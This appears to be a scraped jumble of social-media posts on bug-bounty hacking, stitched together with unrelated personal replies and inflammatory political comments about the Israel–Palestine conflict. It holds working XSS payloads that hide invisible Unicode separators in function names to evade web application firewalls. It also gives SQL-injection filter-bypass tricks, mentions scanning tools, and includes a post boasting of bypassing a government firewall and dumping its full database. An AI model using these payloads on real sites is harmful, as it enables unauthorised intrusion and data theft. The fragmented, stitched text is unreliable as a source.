SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
Bug Bounty Tip
Bypass XSS WAF protection using invisible separators before or after function name
<script>alert\uFEFF('(1)')</script>
<img/src/onerror= alert&
#65279
;(1)>
<svg/onload=alert&
#8288
;(1)>
<img/src/onerror=a&
#8203
;lert(1)>
<script>alert (1)</script>
In the context of the sqlmap tool, the --hex option is used to convert data to a hexadecimal representation before sending it to the target server. This can be useful in some cases when there is a need to send data encoded in hexadecimal format. For example,
Congratulations, my brother
@coffinxp7
. I think you deserve more than that. You are a successful person and like to develop himself. I hope you reach a million followers soon.☺️❤
Features
Web Application Firewall (WAF) detection.
Cross Site Scripting (XSS) tests.
SQL injection time based test.
SQL injection error based test.
Local File Inclusion (LFI) test.
Cross Site Tracing (XST) test.
@coffinxp7
I think they will not respond because they do not care about websites these days because conditions are difficult for them because the Israeli occupation kills thousands of children and women every day. Open the website and you will see the number of dead
في بعض الأحيان يكون العقل اقوى من اي سلاح ، زرع احد المجاهدين علم فلسطين في اراضي فلسطين المحتلة وجاء خنزير اسرائيلي لنزع العلم ثم كانت المفاجأة
Sometimes the mind is stronger than any weapon. One of the mujahideen planted the Palestinian flag in the occupied territories..
SQLi_Sleeps
It is a simple script that allows to find SQLi vulnerabilities, obtaining the response time greater than 20 seconds per medium and time-based injection.
For example, by adding control characters like %00 , %0A , etc. or inserting mathematical operations ( 'AND'1'=1*1 instead of 'AND'1'='1' ) or adding specific comments like /*!50000%55nIoN*/ /*!50000%53eLeCt*/ and much more.
Bypassed palestine Goverment Firewall and WAF also Forbidden Directory and get full database
Sorry, brother
@coffinxp7
, I did not want to interfere in your work, this is just to increase knowledge and curiosity
@MediaZawaya
I communicated with you via email and no one cared. I reported a vulnerability in unauthorized access to databases, bypassing protection systems, and tampering with data.